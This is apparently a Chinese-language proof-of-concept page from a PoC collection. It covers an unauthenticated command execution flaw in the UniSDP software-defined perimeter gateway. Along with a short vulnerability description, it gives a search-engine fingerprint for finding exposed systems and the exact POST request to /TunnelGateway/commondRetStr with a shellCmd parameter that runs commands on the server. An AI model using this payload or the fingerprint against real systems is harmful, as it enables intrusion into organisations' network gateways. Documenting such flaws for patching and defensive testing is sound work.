Awesome-POC/网络设备漏洞/联软安界 UniSDP 软件定义边界系统 commondRetSt 命令执行漏洞.md
2024-11-06 14:10:36 +08:00

33 lines
700 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 联软安界 UniSDP 软件定义边界系统 commondRetSt 命令执行漏洞
## 漏洞描述
联软安界UniSDP软件定义边界系统是基于零信任的下一代VPN该系统2021.04.28版本中TunnelGateway某接口存在安全漏洞漏洞允许攻击者将特制请求发送到服务器并远程命令执行。
## 漏洞影响
```
联软安界 UniSDP 软件定义边界系统
```
## 网络测绘
```
title="UniSSOView"
```
## 漏洞复现
登录页面
![image-20230314090312164](images/image-20230314090312164.png)
验证POC
```
POST /TunnelGateway/commondRetStr
shellCmd=id
```
![image-20230314090322883](images/image-20230314090322883.png)